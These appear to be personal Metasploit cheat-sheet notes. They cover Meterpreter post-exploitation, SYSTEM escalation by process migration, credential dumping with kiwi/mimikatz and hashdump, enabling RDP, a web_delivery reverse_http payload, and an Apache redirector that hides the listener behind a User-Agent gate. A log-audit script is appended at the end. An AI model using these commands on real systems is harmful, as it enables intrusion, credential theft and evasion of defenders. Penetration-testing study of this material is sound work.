The Real Hugo

Metasploit

  • -j: run the job in the background
  • sessions -i 1: interact with session 1

Meterpreter

post/multi/manage/shell_to_meterpreter (upgrades a plain shell session to Meterpreter)
  • execute commands
  • search files
  • download and upload files

Metasploit after gaining foothold

  • A Meterpreter shell is open on the target. Run the exploit suggester:
run post/multi/recon/local_exploit_suggester
  • Decide on your exploit and background the Meterpreter session.
  • Use the exploit:
use <path/to/exploit>
  • Fill in options such as SESSION and run the exploit.

Privilege Escalation on Windows Using Metasploit

  • Find a process with higher privileges and migrate to it, e.g. spoolsv.exe:
migrate -N spoolsv.exe
  • After NT AUTHORITY\SYSTEM is gained, load the kiwi (mimikatz) extension and dump all credentials:
load kiwi
help
creds_all
  • Enable RDP via run post/windows/manage/enable_rdp

Hashdump on Windows

  • From Meterpreter, either the hashdump post module or the kiwi extension:
run post/windows/gather/hashdump
load kiwi
lsa_dump_sam

Web delivery

use exploit/multi/script/web_delivery
show targets
set LPORT <attacker-Port>
set PAYLOAD windows/meterpreter/reverse_http
run -j
  • Copy the generated command into PowerShell/cmd

Reverse Proxy

  • Hide the listener behind a reverse proxy, e.g. Apache
  • For Apache, these modules must be enabled:
    • rewrite
    • proxy
    • proxy_http
    • headers
  • Use the User-Agent header to identify targets: only requests whose User-Agent matches the condition are forwarded to the listener; everything else is served from DocumentRoot
<VirtualHost *:80>

    ServerAdmin webmaster@localhost
    DocumentRoot /var/www/html

    # ProxyPass forwards unconditionally, so the User-Agent condition must be
    # attached to a RewriteRule with the [P] (proxy) flag instead.
    RewriteEngine On
    RewriteCond %{HTTP_USER_AGENT} "^User-Agent$"
    RewriteRule ^/(.*)$ "http://localhost:8080/$1" [P,L]

    # <Directory> needs a path argument
    <Directory /var/www/html>
        AllowOverride All
    </Directory>

    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined

</VirtualHost>
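On the audit side, the combined-format access log the CustomLog directive writes records the User-Agent of every request, so whoever reviews that host's logs can reconstruct which clients the condition forwarded and which were served the decoy site. The following is an added example, not part of the original notes: it parses combined-format lines (constructed samples, not real traffic) and splits clients by whether their User-Agent matches the RewriteCond pattern.

```python
import re
from collections import Counter

# Constructed sample lines in Apache "combined" format (the format the
# CustomLog directive above uses); these are not real log entries.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Oct/2023:13:55:36 +0000] "GET / HTTP/1.1" 200 2326 "-" "User-Agent"
203.0.113.11 - - [10/Oct/2023:13:55:40 +0000] "GET / HTTP/1.1" 200 10918 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.10 - - [10/Oct/2023:13:56:02 +0000] "POST /upload HTTP/1.1" 200 512 "-" "User-Agent"
198.51.100.7 - - [10/Oct/2023:13:57:15 +0000] "GET /robots.txt HTTP/1.1" 404 196 "-" "curl/8.4.0"
"""

# One combined-format line: the User-Agent is the last quoted field.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_combined(text):
    """Yield one dict per parseable line; lines that do not match are skipped."""
    for line in text.splitlines():
        m = COMBINED_RE.match(line)
        if m:
            yield m.groupdict()


def audit_gate(text, gate_pattern):
    """Apply the same regex the RewriteCond uses to each request's User-Agent.

    Returns (matched, unmatched): Counters of client IPs whose requests
    would have been proxied upstream versus served from DocumentRoot.
    """
    gate = re.compile(gate_pattern)
    matched, unmatched = Counter(), Counter()
    for entry in parse_combined(text):
        if gate.search(entry["ua"]):
            matched[entry["ip"]] += 1
        else:
            unmatched[entry["ip"]] += 1
    return matched, unmatched


if __name__ == "__main__":
    forwarded, served = audit_gate(SAMPLE_LOG, r"^User-Agent$")
    print("forwarded upstream:", dict(forwarded))
    print("served locally:", dict(served))
```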